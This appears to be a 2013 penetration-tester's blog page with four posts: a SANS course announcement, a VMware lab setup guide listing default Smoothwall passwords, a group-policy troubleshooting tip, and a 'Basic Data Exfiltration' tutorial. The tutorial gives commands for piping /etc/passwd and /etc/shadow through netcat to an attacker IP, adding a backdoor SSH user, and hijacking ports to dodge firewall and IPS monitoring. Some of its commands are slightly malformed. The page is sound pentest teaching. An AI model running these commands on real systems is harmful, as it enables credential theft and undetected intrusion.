Pages

Sunday, February 24, 2013

SANS SEC660

Hey all,

I'm excited to let you guys know that I'll be taking the SEC660 class offered by SANS Institute. For the whole of next week (5.5 days), the course will be covering more advance areas of a penetration tester and I can't wait! More information on the SEC660 can be found here: https://www.sans.org/course/advanced-penetration-testing-exploits-ethical-hacking

Previously, I took the 'basics' version of the curriculum by SANS, SEC560, and found that the course teaches you more than 'academic materials' or 'theories' but provide you with practical and working knowledge to do your job as a security professional. In addition, the instructors are veteran professionals themselves and they have shared quite a fair bit of their on-the-job experiences where are extremely valuable.

If you're taking SEC660 or other courses next week in Secure Singapore 2013, drop me a note to link up and I'll buy you a cuppa.

Break To Protect,
J.S.

Friday, February 15, 2013

Setting up a Penetration Testing Environment

Just a while ago, I was talking to another security enthusiast and we were discussing on "how to set up a pentest environment at home". The worse thing is that I only had access to Vmware workstation and attacking from a Backtrack 5 to a vulnerable machine. But that's just ONE hop and REAL environments have multiple hops (e.g. through a Firewall, DMZ, internal and one more internal).

Although I've read a couple of articles regarding setting up penetration testing environment, I still had no idea how to make one until yesterday. I was reading up on VMWare stuffs, I discovered this valuable page that can solve the problem of virtualizing your attacking and victim machines with firewalls and load balancers in the equation to test. Try reading this:
http://www.vmware.com/support/ws55/doc/ws_net_configurations_custom.html

Pre-requisite:
1. RAMS, LOTSA RAMS (I'm on 8GB)
2. Enough CPU resources (I'm on i5)
3. OF course, enough HDD space (I'm on 128SSD and 500HDD)
4. VMWare Workstation (I'm on a 8)
5. VMWare images (in this demo, I'll be using: BTR3, Smoothwall 3 Polar, An Exploitable Machine)


Configuring your VMWare Network Adaptors:
BTR5 - Two Network Adaptors
1. Bridged (or Vmnet 0)
2. VMnet 9 (Set Host-only)

Smoothwall 3 - Two Network Adaptors
1. VMnet 9 (Set Host-only)
2. VMnet 2 (Set Host-only)

Win XP / Metasploitable / KioptrixOther vulnerable victim machines
1. VMnet 2 (Set Host-only)

VMWare Workstation - Open Edit -> Virtual Network Editor
Add VMnet 2 and 9. DHCP is optional.

* Whatever IP you used for the VMnet, please do not use x.x.x.1 as they are used by the VMWare's Virtual Switches
Setting up your network:
BTR5 (*your eth[num] may be different, so adjust accordingly)
1. eth0 to your real local network address. For mine is 10.0.0.x/24. You'll be able to access internet from your backtrack5 for apt-get installs and wget of useful tools ;)
2. eth1 to 10.0.9.3/24
set your default gateway to 10.0.9.2 (Smoothwall 3's IP)

Smoothwall 3
1. Login as 'root' using 'happydays' as password
2. set your eth0 to 10.0.9.2/24
3. set your eth1 to 10.0.2.2/24
* Remember, don't get confused with your network adaptors connecting to their respective VMnets.

Win XP
1. Set your "Local Area Connection" interface to 10.0.2.100/24 and gateway to 10.0.2.2 (Smoothwall 3's IP also)

By now you should be able to do WIN XP -PING-> BTR5 and get a response.
However, you won't be able to have BTR5 ping WIN XP for some reasons.

Now it's a good time to WEB LOGIN to your Smoothwall 3's and start configuring it.
https://10.0.2.2:441/ using 'admin' and password as 'happydays'

This post I won't be sharing on the Smoothwall's configuration for port fowarding and other configuration. And REMEMBER, to make your Smoothwall's INTERFACE CONFIGURATION stay persistent, you'll need to CHANGE the Interfaces' IP address using the Web GUI.

Need help? Send me an email: breaktoprotect(at)gmail(dot)com

Thanks for reading. Happy fun times, people~

Break To Protect,
J.S.

Wednesday, February 13, 2013

Klutz with Local Group Policy

Part of my work requires me to perform configuration review of my clients' security settings of their hosts. So one of them is a 2003 and I was experimenting with a VM image. It took me quite a while searching on google to find the problem WHY my gpresults keep showing "No local group policy applied (empty)" despite me changing some settings in gpedit.msc.

Long story cut short, you NEED to set something under BOTH 'Computer Configuration' and 'User Configuration'. So if even you've set a trillion settings on 'Computer Configuration' and none on 'User Configuration', you'll get zilch when you do a gpresult/z>gpresults_%computername%.txt. And the same applies vice versa.[1]

After setting ONE item under 'User Configuration', I saw that my Local Group Policy was finally applied when I perform the gpresult. Awesome and phew~ Thank you forum folks from www.techexams.net

Break To Protect,
J. S.


Reference(s):
[1] http://www.techexams.net/forums/mcsa-mcse-windows-2003-general/66468-gpo-were-not-applied-because-they-were-filtered-out.html

Sunday, February 10, 2013

Basic Data Exfiltration

So you pwned the system and got root access, awesome but what's next? Oh, I need to get the /etc/passwd and /etc/shadow out for a start. Ok how?

There are a couple of ways to do it:
1. Meterpreter's 'download' command
It's great if you're using meterpreter as the payload. Simple and hassle free. Just 'cd' and 'pwd' through the victim machine's directory without having to worry about the OS platform. But the limitation is if you are not using metasploit to pwn your victim machine, then you can't do this.

2. Netcat
Meow! Using this network utility to do a transfer of a binary file is definitely a viable option. 
All you'll need to do is:

Attacking Machine:~/goodies_folder/# nc -l -p 4444 > file_i_am_stealing.ext

Victim Machine:~/etc/# cat passwd | nc 192.168.1.200 passwd
* 192.168.1.200 is, of course, the attacker's machine IP address

Let's say the machine you've compromised has a host-based firewall that whitelist ports and deny all others, there are two ways to circumvent this:
- Tweak the iptable <= Not recommended, coz' you're changing critical configuration of the host machine. I wouldn't want to trigger the IPS or FIM monitoring this victim machine :S
- Shut down a service and hijack the port. <= Say XYZ service is a pretty much unused but available listening on port 112. Shut down the XYZ service, perform the exfil and then turn it back up. 

3. SSH
If the SSH daemon is up, create a new user e.g. ted
Victim Machine:~/# /usr/sbin/useradd ted
 Victim Machine:~/# /usr/bin/passwd ted
* Set your password 
Victim Machine:~/# echo >> /etc/ssh/sshd_config AllowUsers ted
Remember to do a netstat -tulpn | grep sshd to make sure that the SSH service is up.

Attacker's Machine:~/# ssh ted@192.168.1.100 password123
4. wget
Good if your victim's machine has a apache webserver up and running.
Simply copy all the files you wanna exfil to /var/www/html
and then:

Attacker's machine:~/# wget http://192.168.1.100 file_you_wanna_retrieve.ext 
Again, you want to make sure that your Apache is running ;)

5. Other ways
There are a couple of more ways but I need to run already, so here's some brief mentions:
- FTP <-- Set up FTP and SCP your way files through
- Covert Channels <-- You can craft ICMP packets and fit your data inside. Haven't tried it yet, but will blog it when I do.
- Email <-- It's lame, but if you got startx or you've VNC-ed into your victim's machine, you can exfil through web browsers =D

Alrighty, hope these helps. Gotta run. Happy fun times~

Break To Protect,
J.S.